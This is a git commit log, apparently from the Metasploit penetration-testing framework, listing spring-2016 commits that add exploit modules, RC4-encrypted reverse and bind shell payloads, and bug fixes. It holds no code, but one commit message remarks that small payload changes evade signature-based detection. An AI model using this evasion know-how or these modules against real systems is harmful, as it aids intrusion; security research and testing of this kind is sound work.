Brent Cook 2694907b79 update cached payload size 2016-05-23 14:30:43 -05:00
RageLtMan cf62218139 Update payload sizes 2016-05-23 14:27:11 -05:00
RageLtMan efc64eaa5f Implement reverse_tcp_rc4_dns payload in metasm
Using the ruby methods for generating assembly blocks defined or
separated in prior commits, create a new payload from the existing
assembly blocks which performs a DNS lookup of the LHOST prior to
establishing a corresponding socket and downloading, and
decrypting the RC4 encrypted payload.

For anyone looking to learn how to build these payloads, these
three commits should provide a healthy primer. Small changes to
the payload structure can yield entropy enough to avoid signature
based detection by in-line or out-of-band static defenses. This
payload was completed in the time between this commit and the last.

Testing:
  Win2k8r2

ToDo:
  Update payload sizes when this branch is "complete"
  Ensure UUIDs and adjacent black magic all work properly
2016-05-23 14:27:11 -05:00
RageLtMan 0e69040a6a Implement reverse_tcp_dns as metasm payload
Using the separation of block_recv and reverse_tcp, implement
reverse_tcp_dns using original shellcode as template with dynamic
injection of parameters. Concatenate the whole thing in the
generation call chain, and compile the resulting shellcode for
delivery.

Metasploit module pruned to bare minimum, with the LHOST OptString
moved into the library component.

Testing:
  Win2k8r2

ToDo:
  Update payload sizes when this branch is "complete"
  Ensure UUIDs and adjacent black magic all work properly

Misc:
  Clean up rc4.rb to use the rc4_keys method when generating a
stage. Makes the implementation far more readable and reduces
redundant code.
2016-05-23 14:27:11 -05:00
RageLtMan df2346d9e0 Implement RC4 metasm payloads for tcp bind and rev
Convert reverse_tcp_rc4 and bind_tcp_rc4 from static shellcode
substitution payloads to metasm compiled assembly approach.

Splits up metasm methods for bind_tcp and reverse_tcp into socket
creation and block_recv to allow for reuse of the socket methods
with the RC4 payloads, while substituting the block_recv methods
for those carrying the appropriate decryptor stubs.

Creates a new rc4 module carrying the bulk of the decryptor and
adjacent convenince methods for standard payload generation.

Testing:
 Tested against Win2k8r2, Win7x64, and WinXPx86

ToDo:
 Ensure all the methods around payload sizing, UUIDs, and other
new functionality, the semantics of which i do not yet fully
understand, are appropriate and do not introduce breakage.
2016-05-23 14:27:11 -05:00
Spencer McIntyre 7e34d1e1cf
Land #6897, use sendall python rtcp shell with ssl 2016-05-21 16:51:10 -04:00
William Vu 6581fbd294 Add note about "mf" malware
This is the malware I found upon shelling my friend's device.
2016-05-20 23:09:10 -05:00
Brent Cook b613dfefb4
Land #6896, fix spelling in caidao_bruteforce_login 2016-05-19 21:54:06 -05:00
root a71e853c2a Fixed cache size for python/shell_reverse_tcp_ssl 2016-05-20 02:32:37 +00:00
root 87398d5195 Fixed python reverse shell ssl send for EOF occurred in violation of protocol error 2016-05-20 01:49:04 +00:00
wchen-r7 506356e15d
Land #6889, check #nil? and #empty? instead of #empty? 2016-05-19 19:23:04 -05:00
wchen-r7 99a573a013 Do unless instead "if !" to follow the Ruby guideline 2016-05-19 19:21:45 -05:00
h00die 706d51389e spelling fix 2016-05-19 19:30:18 -04:00
William Vu a16f4b5167 Return nil properly in rescue
Missed this because I copypasta'd myself.
2016-05-19 15:35:38 -05:00
William Vu d018bba301 Store SSH key as a note
I know, I know, it should use the creds model. >:[
2016-05-19 15:12:58 -05:00
William Vu 9f738c3e41 Add note about overwritten files 2016-05-19 15:07:27 -05:00
William Vu 8fccb26446 Add Ubiquiti airOS exploit
Thanks to my friend wolf359 for providing a test device!
2016-05-19 14:50:20 -05:00
ssyy201506 31bbcfca49 Fix ms13_081_track_popup_menu 2016-05-19 17:22:47 +09:00
h00die c621f689b2 more descriptive note per @sempervictus 2016-05-18 19:08:01 -04:00
Vex Woo b5284375a7 osb_uname_jlist - NoMethodError undefined method 'empty?' for nil:NilClass 2016-05-18 00:16:53 -05:00
Vex Woo 11fedd7353 ca_totaldefense_regeneratereports - NoMethodError undefined method 'empty?' for nil:NilClass 2016-05-18 00:15:28 -05:00
Vex Woo a6405beeda ams_hndlrsvc - NoMethodError undefined method 'empty?' for nil:NilClass 2016-05-18 00:13:40 -05:00
Vex Woo 41bcdcce61 fix struts_code_exec_exception_delegator - NoMethodError undefined method 'empty?' for nil:NilClass 2016-05-18 00:11:57 -05:00
Vex Woo bc257ea628 fix struts_code_exec - NoMethodError undefined method 'empty?' for nil:NilClass 2016-05-18 00:10:32 -05:00
Vex Woo 68b83c6e3a datastore['CMD'].blank? 2016-05-17 23:56:59 -05:00
h00die 815a2600a8 additional description 2016-05-17 22:07:33 -04:00
h00die 640e0b9ff7 working ready for pr 2016-05-17 21:58:32 -04:00
Vex Woo a4e7e373f3 fix ams_xfr.rb - NoMethodError undefined method 'empty?' for nil:NilClass 2016-05-17 17:55:18 -05:00
Tijl Deneut 36a9ef83ab Added phoenix_command.rb 2016-05-17 15:45:45 +02:00
wchen-r7 e8ac568352 doesn't look like we're using the tcp mixin 2016-05-17 03:15:26 -05:00
wchen-r7 08394765df Fix #6879, REXML::ParseException No close tag for /div 2016-05-17 03:14:00 -05:00
William Vu 9c61490676 Fix some inconsistencies
Failed to catch these while editing. :(
2016-05-17 02:50:12 -05:00
Jon Hart 92d07f74ff
Remove unnecessary double expand_path 2016-05-16 17:34:12 -07:00
Jon Hart 8bccfef571
Fix merge conflict 2016-05-16 17:29:45 -07:00
Brent Cook cf0176e68b
Land #6867, Add Dell SonicWALL Scrutinizer 11.0.1 MethodDetail SQL Injection 2016-05-16 19:00:10 -05:00
Vex Woo 4a4904149b ruby conditional operator -> expression 2016-05-16 10:45:04 -05:00
Vex Woo 4a3ab9d464 add a module for netcore/netdis udp 53413 backdoor 2016-05-16 02:11:53 -05:00
wchen-r7 3ea2f62376
Land #6875, update description for auxiliary/spoof/nbns/nbns_response 2016-05-15 12:34:53 -05:00
wchen-r7 8e85e8f9d7
Land #6859, Add TP-Link sc2020n Module 2016-05-15 12:33:54 -05:00
sho-luv 5361aaadbd Update nbns_response.rb
Just correcting the description section of this module
2016-05-14 15:24:38 -07:00
Brent Cook 21d74a64fe
Land #6874, Improve exploit for CVE-2016-0854 2016-05-14 11:08:17 -05:00
Brent Cook 0d176f2c92 remove a couple of unnecessary ternary ops 2016-05-14 11:07:43 -05:00
Brent Cook c7cbaa08c8
Land #6576, add Search Engine Subdomains Collector (Bing / Yahoo / ..) 2016-05-14 10:50:53 -05:00
Brent Cook 2e3e4f0069
Land #6296, Added a multi-platform post module to generate TCP & UDP egress traffic 2016-05-14 00:03:00 -05:00
Brent Cook 3542d907f7 simplify description, move the bulk of documentation to documentation/ 2016-05-14 00:01:51 -05:00
Brent Cook 8ce0365c7f
See rapid7/metasploit-payloads#98, update cached payload sizes 2016-05-13 23:05:34 -05:00
Brent Cook d398419971
Land #6832, Check LHOST value before running shell_to_meterpreter, add docs 2016-05-13 22:50:22 -05:00
h00die 314d73546c additional details, not working on tablet via malicious apk meterpreter 2016-05-13 23:12:44 -04:00
Brent Cook a940481f62
Land #6834, Authorized FTP JCL exploit for z/OS 2016-05-13 21:29:45 -05:00
Brent Cook 5c494480e6 handle failure more gracefully 2016-05-13 21:29:25 -05:00
wchen-r7 3b5db26ff5 Fix #6872, change upload action for CVE-2016-0854 exploit
This patch includes the following changes:

* Instead of the uploadFile action, this patch uses uploadImageCommon
  to be able to support both Advantech WebAccess builds: 2014 and
  2015.
* It uses an explicit check instead of the passive version check.
* It cleans up the malicious file after getting a session.
* Added module documentation to explain the differences between
  different builds of Advantech WebAccess 8.0s, and 8.1.

Fix #6872
2016-05-13 19:47:18 -05:00
h00die 5099124f3d module compiles, fails correctly but cant yet verify it works 2016-05-12 22:18:43 -04:00
Bigendian Smalls 2d5cf6cfe4 Authorized FTP JCL exploit for z/OS
This exploit module allows a user with credentials to execute JCL on a
vulnerable mainframe system running z/OS and an appropriately configured
FTP server.
2016-05-12 14:46:31 -05:00
Brent Cook a69432abe5 update module class and move to recon from manage 2016-05-12 12:42:04 -05:00
Brent Cook 9f923cdb00 Merge branch 'master' into land-6296-egress 2016-05-12 12:36:47 -05:00
wchen-r7 8f9762a3e5 Fix some comments 2016-05-12 00:19:18 -05:00
wchen-r7 da293081a9 Fix a typo 2016-05-11 22:48:23 -05:00
wchen-r7 9d128cfd9f Add Dell SonicWALL Scrutinizer 11.0.1 MethodDetail SQL Injection 2016-05-11 22:27:18 -05:00
Nicholas Starke 4b23d2dc58 Adjusting exception handling
This commit adjusts the error handling to close the socket before
calling fail_with and adds specific exceptions to catch
2016-05-11 17:18:51 -05:00
HD Moore 32e1a19875 Fix up the disclosure date 2016-05-11 00:18:22 -05:00
HD Moore ded79ce1ff Fix CVE syntax 2016-05-10 23:18:45 -05:00
HD Moore 4a5d150716 Fixups to continue supporting Rails 4.2.x 2016-05-10 23:12:48 -05:00
HD Moore 04bb493ccb Small typo fixed 2016-05-10 23:07:51 -05:00
Nicholas Starke 32ae3e881e Adding save_cred and exception handling to module
This commit adds a save_cred method for saving off the credentials
upon a successful login attempt.  Also, exception handling surrounding
the opening of the telnet socket has been added to avoid any accidental
resource leaking.
2016-05-10 20:54:44 -05:00
HD Moore 7c6958bbd8 Rework rails_web_console_v2_code_exec to support CVE-2015-3224 2016-05-10 11:08:02 -05:00
wchen-r7 3db72e9b4b
Land #6853, use send_request_cgi! for CVE-2016-0854 exploit 2016-05-09 16:10:04 -05:00
Brent Cook 57a3a2871b remove various session manipulation hacks since session.platform should always contain an os identifier 2016-05-08 22:39:41 -05:00
Nicholas Starke 8eb3193941 Adding TP-Link sc2020n Module
This module exploits a command injection vulnerability in
TP-Link sc2020n network video cameras in order to start the
telnet daemon on a random port.  The module then connects to
the telnet daemon, which returns a root shell on the device.
2016-05-08 14:02:50 -05:00
Kyle Gray 2a546d191f
Land #6854, smtp header fix
Fixes an issue with duplicate headers when sending emails.

Fixes MS-1476
2016-05-06 12:07:12 -05:00
William Vu 2abb062070 Clean up module 2016-05-06 11:51:29 -05:00
David Maloney e4e6246692 Merge branch 'master' of github.com:rapid7/metasploit-framework 2016-05-06 10:55:52 -05:00
Louis Sato 8dc7de5b84
Land #6838, add Rails web-console module 2016-05-05 15:53:52 -05:00
William Vu 1bc2ec9c11 Update vulnerable versions to include 6.x (legacy) 2016-05-05 14:18:42 -05:00
William Vu 26b749ff5a Add default LHOST
This is a massive workaround and probably shouldn't be done. :-)
2016-05-05 14:18:42 -05:00
William Vu 5c713d9f75 Set default payload
Land #6849 for this to be effective.
2016-05-05 14:18:42 -05:00
William Vu 232cc114de Change placeholder text to something useful
A la Shellshock. :)
2016-05-05 14:18:42 -05:00
William Vu f32c7ba569 Add template generation details 2016-05-05 14:18:42 -05:00
William Vu 23a0517a01 Update description 2016-05-05 14:18:42 -05:00
William Vu d7b76c3ab4 Add more references 2016-05-05 14:18:42 -05:00
William Vu 5c04db7a09 Add ImageMagick exploit 2016-05-05 14:18:42 -05:00
Adam Cammack 2e460a87dd
Remove extra assignment 2016-05-05 11:24:19 -05:00
David Maloney 891a788ad4
Land #6849, mknod to mkfifo
lands wvu's pr to switch from mknod to
mkfifo for netcat payloads
2016-05-05 10:34:41 -05:00
Vex Woo 35a780c6a8 fix send_request_cgi redirection issues #6806 2016-05-05 09:55:32 -05:00
Christian Mehlmauer 9357a30725
remove duplicate key 2016-05-04 22:15:33 +02:00
William Vu 74e5772bbf Replace mknod with mkfifo for portability
Works on BSD and OS X now. This has been bugging me for a while.
2016-05-04 02:32:37 -05:00
HD Moore 779a7c0f68 Switch to the default rails server port 2016-05-03 02:06:58 -05:00
HD Moore 8b04eaaa60 Clean up various whitespace 2016-05-03 02:06:37 -05:00
wchen-r7 68ad9b0b53
Land #6835, support Windows and Java platforms for struts_dmi_exec 2016-05-02 15:04:42 -05:00
wchen-r7 df44dc9c1c Deprecate exploits/linux/http/struts_dmi_exec
Please use exploits/multi/http/struts_dmi_exec, which supports
Windows and Java targets.
2016-05-02 15:03:25 -05:00
Brian Patterson be363411de
Land #6317, Add delay(with jitter) option to auxiliary scanner and portscan modules 2016-05-02 13:09:40 -05:00
HD Moore 3300bcc5cb Make msftidy happier 2016-05-02 02:33:06 -05:00
HD Moore 67c9f6a1cf Add rails_web_console_v2_code_exec, abuse of a debug feature 2016-05-02 02:31:14 -05:00
join-us 6a00f2fc5a mv exploits/linux/http/struts_dmi_exec.rb to exploits/multi/http/struts_dmi_exec.rb 2016-05-01 00:00:29 +08:00
join-us ec66410fab add java_stager / windows_stager | exploit with only one http request 2016-04-30 23:56:56 +08:00
wchen-r7 73ac6e6fef
Land #6831, Add CVE-2016-3081 Apache struts s2_032 DMI Code Exec 2016-04-29 11:53:47 -05:00
wchen-r7 d6a6577c5c Default payload to linux/x86/meterpreter/reverse_tcp_uuid
Default to linux/x86/meterpreter/reverse_tcp_uuid for now because
of issue #6833
2016-04-29 11:52:50 -05:00
join-us 288975a9ce rm modules/exploits/multi/http/struts_dmi_exec.rb 2016-04-30 00:44:31 +08:00
Security Corporation 9d279d2a74 Merge pull request #15 from wchen-r7/pr6831
Changes for Apache struts from @wchen-r7
2016-04-30 00:37:53 +08:00
join-us 15ffae4ae8 rename module name 2016-04-30 00:17:26 +08:00
join-us 1d95a8a76d rename struts_code_exec_dynamic_method_invocation.rb to struts_dmi_exec.rb 2016-04-30 00:13:34 +08:00
wchen-r7 97061c1b90 Update struts_dmi_exec.rb 2016-04-29 11:13:25 -05:00
join-us 9e56bb8358 send http request (get -> post) 2016-04-30 00:08:00 +08:00
wchen-r7 e9535dbc5b Address all @FireFart's feedback 2016-04-29 11:03:15 -05:00
wchen-r7 6f6558923b Rename module as struts_dmi_exec.rb 2016-04-29 10:34:48 -05:00
wchen-r7 2f66442f1d Fix #5191, bad LHOST format causes shell_to_meterpreter to backtrace
When using shell_to_meterpreter via a pivot, the LHOST input's format
might be invalid. This is kind of a design limitation, so first we
check the input, and there is a module doc to go with it to explain
a workaround.

Fix #5191
2016-04-28 23:03:54 -05:00
join-us 643591546e struts s2_032 rce - linux_stager 2016-04-29 10:49:56 +08:00
wchen-r7 2a91a876ff Update php/meterpreter_reverse_tcp size 2016-04-27 16:14:38 -05:00
William Vu c16a02638c Add Oracle Application Testing Suite exploit 2016-04-26 15:41:27 -05:00
William Vu 0cb555f28d Fix typo 2016-04-26 15:26:22 -05:00
Adam Cammack f28d280199
Land #6814, move stdapi to exist? 2016-04-24 13:41:11 -04:00
wchen-r7 4a95e675ae Rm empty references 2016-04-24 11:46:08 -05:00
wchen-r7 2edd6869fc rm references key 2016-04-24 03:09:59 -05:00
Brent Cook 194a84c793 Modify stdapi so it also uses exist? over exists? for ruby parity
Also add an alias for backward compatibility.
2016-04-23 17:31:22 -04:00
wchen-r7 816bc91e45 Resolve #6807, remove all OSVDB references.
OSVDB is no longer a vulnerability database, therefore all the
references linked to it are invalid.

Resolve #6807
2016-04-23 12:32:34 -05:00
Brent Cook 9a873a7eb5 more style fixes 2016-04-23 12:18:28 -04:00
Brent Cook d86174c3bf style fixes 2016-04-23 12:18:28 -04:00
Brent Cook 4250725b13 fix incorrect hex port conversion 2016-04-23 12:18:28 -04:00
Brent Cook 7ff5a5fd7e switch mainframe payloads to fixed size 2016-04-23 11:40:05 -04:00
join-us 81af4d2675 Fix: merge error 2016-04-23 23:19:08 +08:00
join-us 1d99d08ac8 rebuild 2016-04-23 23:15:19 +08:00
join-us de9ac28db1 class Metasploit4 -> class MetasploitModule 2016-04-23 23:03:48 +08:00
join-us e2fcfc8d09 fix index / space 2016-04-23 23:02:41 +08:00
join-us fca4d53a6f add yahoo_search / bing_search exception handler 2016-04-23 22:58:39 +08:00
join-us d9633078ec merge yahoo_search_domain[ip] / bing_search_domain[ip] 2016-04-23 22:45:47 +08:00
join-us 66c0832f27 add Rex::Socket.getaddresses exception handler 2016-04-23 20:09:12 +08:00
join-us b47b83dfaa add results.nil? / results.empty? check 2016-04-23 19:47:33 +08:00
join-us 7579abb34e report_note in a line 2016-04-23 19:43:44 +08:00
join-us 55e31bacee add exception handler 2016-04-23 19:01:55 +08:00
join-us 73121f7e2f add vprint_good 2016-04-23 18:50:48 +08:00
join-us bc1f829fe5 class Metasploit4 -> class MetasploitModule 2016-04-23 17:36:22 +08:00
wchen-r7 da9f156913 Print IP in print_* 2016-04-22 16:03:31 -05:00
wchen-r7 3aa02891e9
Bring #6801 up to date with upstream-master 2016-04-22 14:04:26 -05:00
wchen-r7 4a435e8d13
Bring hp_dataprotector_install_service up to date w/ upstream-master 2016-04-22 13:42:41 -05:00
wchen-r7 db1d973ef0 Cosmetic changes for hp_dataprotector_install_service 2016-04-22 13:41:18 -05:00
join-us 16ff74e293 syntax check / code reduce 2016-04-22 10:53:03 +08:00
Vincent Yiu ca4bcfe62a Update enum_emet.rb
Cleaned up a bit more
2016-04-22 00:41:10 +01:00
Vincent Yiu c81d0ade3f Update, implemented
Took @bcook-r7's advice
2016-04-22 00:37:03 +01:00
Vincent Yiu 30ac6b4a93 enum_emet
A module to enumerate all the EMET wildcard paths.
2016-04-22 00:20:25 +01:00
dmohanty-r7 67968e912c
Land #6785 Add CVE-2016-0854 Advantech WebAccess Arbitrary File Upload 2016-04-21 12:02:04 -05:00
Brent Cook 57ab974737 File.exists? must die 2016-04-21 00:47:07 -04:00
504137480 c08872144f Update advantech_webaccess_dashboard_file_upload.rb 2016-04-21 09:33:03 +08:00
504137480 dcb9c83f98 Update advantech_webaccess_dashboard_file_upload.rb 2016-04-21 09:28:42 +08:00
Louis Sato 6b3326eab2
Land #6707, support for LURI handler 2016-04-20 16:26:07 -05:00
wchen-r7 e1e43db551
Land #6789, remove overwritten keys from hashes 2016-04-20 13:33:31 -05:00
Fakhir Karim Reda zirsalem f0d403124c Update symantec_brightmail_ldapcreds.rb 2016-04-20 18:58:12 +02:00
Karim Reda Fakhir cda104920e delete telisca abuse 2016-04-20 17:09:13 +01:00
Karim Reda Fakhir c322a4b314 added modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb 2016-04-20 17:01:18 +01:00
Karim Reda Fakhir dc3a185519 delete modules/auxiliary/voip/telisca_ips_lock_abuse.rb 2016-04-20 16:48:37 +01:00
Josh Hale 57467b94d9 Fix RegExp evaluation in is_routable? function 2016-04-20 10:22:46 -05:00
Karim Reda Fakhir 5adf5be983 add symantec bright mail ldap creds 2016-04-20 16:05:24 +01:00
Brent Cook 57cb8e49a2 remove overwritten keys from hashes 2016-04-20 07:43:57 -04:00
Karim Reda Fakhir dfb2b95e46 Merge remote-tracking branch 'upstream/master'
Merge
2016-04-20 12:21:16 +01:00
Brian Patterson b74930f5c9
Land #6771, Deprecate dns_bruteforce / dns_cache_scraper / dns_info / dns_reverse_lookup / dns_srv_enum 2016-04-19 16:30:36 -05:00
504137480 2400345fff Merge pull request #2 from open-security/advantech_webaccess_dashboard_file_upload
Advantech webaccess dashboard file upload
2016-04-19 12:59:32 +08:00
join-us 0407acc0ec add print_status with vuln_version? 2016-04-19 11:22:00 +08:00
join-us c88ddf1cc4 fix NilClass for res.body 2016-04-19 10:27:20 +08:00
Adam Cammack 3da451795c
Fix potential case issue
Even though the options were getting put back in a datastore, the
original case could still be lost and that would be bad.
2016-04-18 17:52:27 -04:00
thao doan fd603102db Land #6765, Fixed SQL error in lib/msf/core/exploit/postgres 2016-04-18 10:44:20 -07:00
wchen-r7 89a3755754
Land #6786, post/windows/manage/autoroute improvements
Resolve #6781
2016-04-18 12:11:42 -05:00
xiaozhouzhou a895b452e6 fix 2016-04-19 00:21:26 +08:00
Brent Cook c596421b01 use generate_uri_uuid_mode for java reverse_http 2016-04-18 08:26:02 -05:00
Tim edd30e433e https tweaks 2016-04-18 08:26:02 -05:00
OJ 555352b210 Force lurl string duplication to avoid stageless issues
I have NO idea why this is even a problem. Mutating state is the spawn of satan.
2016-04-18 08:25:19 -05:00
OJ a74a7dde55 More fixies for LURI in Python, and native too 2016-04-18 08:25:19 -05:00
OJ 06d53112e3 Add support for LURI to the java and android payloads 2016-04-18 08:24:41 -05:00
OJ b95267997d Fix LURI support for stageless, transport add/change and code tidies 2016-04-18 08:24:41 -05:00
join-us ce9b692dd8 add print_status 2016-04-18 20:43:39 +08:00
join-us 7143668671 fix version_match 2016-04-18 20:31:32 +08:00
join-us 897238f3ec identify fingerpriint / make the code clear 2016-04-18 19:55:42 +08:00
504137480 7d1095bc08 Update advantech_webaccess_dashboard_file_upload.rb 2016-04-18 11:24:03 +08:00
504137480 47b5398152 Update advantech_webaccess_dashboard_file_upload.rb 2016-04-18 11:05:25 +08:00
Josh Hale 48556483b5 Fix a few comments 2016-04-17 19:16:52 -05:00
Josh Hale 32590c89b7 Add interface name to routing status message 2016-04-17 14:15:50 -05:00
504137480 ae23da39b8 Update advantech_webaccess_dashboard_file_upload.rb 2016-04-17 21:23:45 +08:00
504137480 ab9e988dd4 Update advantech_webaccess_dashboard_file_upload.rb 2016-04-17 21:15:03 +08:00
504137480 6c969b1c3b Update advantech_webaccess_dashboard_file_upload.rb 2016-04-17 18:49:56 +08:00
Josh Hale fb7194c125 Work on autoroute.md 2016-04-17 00:04:42 -05:00
xiaozhouzhou 32192d3034 Advantech WebAccess Dashboard Viewer Arbitrary File Upload
Advantech WebAccess Dashboard Viewer Arbitrary File Upload
2016-04-17 11:29:06 +08:00
Josh Hale a5e48b6112 Add default option and clean up comments 2016-04-16 19:50:08 -05:00
Josh Hale 6550e0bc1b Finish up autoadd_interface_routes 2016-04-16 18:42:41 -05:00
Josh Hale b3d199c055 Add get_subnet_octet and test 2016-04-16 14:57:39 -05:00
Josh Hale b1064af082 Initial get_subnet testing 2016-04-16 13:50:15 -05:00
Josh Hale 018e7807fe Identify routable networks 2016-04-15 22:21:54 -05:00
Josh Hale e8863ba09d Initial autoadd_interface_routes work 2016-04-15 22:13:17 -05:00
wchen-r7 a434622d21
Land #6769, Add CVE-2016-1593 Novell ServiceDesk Authenticated Upload 2016-04-15 18:59:37 -05:00
Josh Hale 5f5c330f2b Initial Testing of Interface Info Gather 2016-04-14 21:59:48 -05:00
wchen-r7 92ef8f4ab3
Land #6751, Correct proftp version check at module runtime 2016-04-14 15:34:53 -05:00
wchen-r7 f1523d0804
Land #6779, Add CVE-2016-1531: Exim "perl_startup" Privilege Escalation 2016-04-14 15:16:50 -05:00
Pedro Ribeiro 8dfe98d96c Add bugtraq reference 2016-04-14 10:23:53 +01:00
Josh Hale c39410a070 Fix autoadd problem 2016-04-13 23:31:27 -05:00
Brent Cook 6ce7055130
Land #6737, Added reverse shell JCL payload for z/OS 2016-04-13 22:19:15 -05:00
Brent Cook 09873f2f9c
Land #6717, Add new cmd mainframe payload (generic_jcl) for z/OS 2016-04-13 22:10:23 -05:00
William Vu 252632a802 Use %w{} for a couple things
Why not? :)
2016-04-13 19:38:57 -05:00
William Vu de004d7da3 Line up some hash rockets 2016-04-13 19:32:35 -05:00
William Vu f8e4253e2f Add telnet to RequiredCmd
Baffles me that cmd/unix/reverse isn't cmd/unix/reverse_telnet.
2016-04-13 18:22:28 -05:00
William Vu 07ee18a62b Do something shady with the exploit method
Hat tip @acammack-r7.
2016-04-13 18:15:17 -05:00
William Vu 43e74fce9e Add Exim privesc 2016-04-13 17:51:20 -05:00
wchen-r7 c52a6393b2
Land #6773, Add Dell Kace K1000 unauthenticated remote root exploit 2016-04-13 10:20:53 -05:00
wchen-r7 1d1a495a93 Style check 2016-04-13 10:19:57 -05:00
CSendner 2319629dd8 Update comments 2016-04-13 05:03:11 +02:00
Christoph Sendner 4970047198 ./modules/post/linux/dos/xen_420_dos.rb 2016-04-13 03:31:02 +02:00
Joshua J. Drake f73309ef01 Fix the ARM NOP generator after #6762, #6768, and #6644 2016-04-12 14:22:57 -05:00
Brendan Coles b61175c6b4 Add Dell Kace K1000 unauthenticated remote root exploit 2016-04-12 16:15:37 +00:00
join-us 815a918a72 deprecate auxiliary/gather/dns_srv_enum 2016-04-12 08:44:47 +08:00
join-us 2bbb58d57e deprecate auxiliary/gather/dns_reverse_lookup 2016-04-12 08:44:21 +08:00
join-us 5e1c540d31 deprecate auxiliary/gather/dns_info 2016-04-12 08:43:50 +08:00
join-us 67f8b309c6 deprecate auxiliary/gather/dns_cache_scraper 2016-04-12 08:43:23 +08:00
join-us 66ec001110 deprecate auxiliary/gather/dns_bruteforce 2016-04-12 08:42:56 +08:00
Jon Hart ca6beeb676
Land #6187, @join-us' cleanup for enum_dns 2016-04-11 09:50:12 -07:00
Pedro Ribeiro 2dc4539d0d Change class name to MetasploitModule 2016-04-10 23:27:40 +01:00
Pedro Ribeiro 1fa7c83ca1 Create file for CVE-2016-1593 2016-04-10 23:17:07 +01:00
Brent Cook 99b4d0a2d5 remove more regex-style bool checks 2016-04-09 13:49:16 -05:00
Jon Hart a37f9c9eda
Clarify note type 2016-04-08 18:35:43 -07:00
Jon Hart 44a98cc36f
Correct overly aggressive style cleanup 2016-04-08 18:00:03 -07:00